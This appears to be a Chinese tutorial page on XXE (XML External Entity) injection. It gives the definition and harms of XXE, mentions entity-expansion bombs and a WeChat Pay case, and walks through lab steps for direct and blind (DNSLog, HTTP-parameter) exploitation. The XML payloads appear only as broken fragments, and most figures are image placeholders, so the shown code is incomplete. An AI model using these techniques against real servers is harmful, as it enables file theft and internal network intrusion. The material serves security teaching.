章节2:XXE漏洞-中

章节2:XXE漏洞-中

02 什么是XXE

XXE

章节2:XXE漏洞-中_第1张图片

XML外部实体注入

XML External Entity Injection

XXE定义

如果Web应用的脚本代码没有限制XML引入外部实体,从而导致用户可以插入一个外部实体,并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取系统命令执行内网端口探测攻击内网网站等危害。

章节2:XXE漏洞-中_第2张图片

章节2:XXE漏洞-中_第3张图片

章节2:XXE漏洞-中_第4张图片

章节2:XXE漏洞-中_第5张图片

章节2:XXE漏洞-中_第6张图片

章节2:XXE漏洞-中_第7张图片

章节2:XXE漏洞-中_第8张图片

章节2:XXE漏洞-中_第9张图片

章节2:XXE漏洞-中_第10张图片

章节2:XXE漏洞-中_第11张图片

lol等是能扩展到更多字符的实体。

章节2:XXE漏洞-中_第12张图片

章节2:XXE漏洞-中_第13张图片

读取一个随机的文件,去请求一个很大或没有固定大小的文件,我们可以把这种攻击叫做XXE的炸弹,它可能会导致你的服务器中断。

03 XXE利用方式

微信支付XXE漏洞

章节2:XXE漏洞-中_第14张图片

章节2:XXE漏洞-中_第15张图片

直打:xxe靶场

  1. 确定使用XML传输数据(抓包可得)
  2. 发送到Repeater
  3. 添加DTD,引用外部文档
  4. Send得到响应

章节2:XXE漏洞-中_第16张图片

章节2:XXE漏洞-中_第17张图片

章节2:XXE漏洞-中_第18张图片

盲打-DNSLog


DOCTYPE root [

%remote;]>

章节2:XXE漏洞-中_第19张图片

章节2:XXE漏洞-中_第20张图片

章节2:XXE漏洞-中_第21张图片

盲打-http接口参数,写入文件



%remote;
]>
&send;

">

你可能感兴趣的:(网络安全,XXE渗透与防御)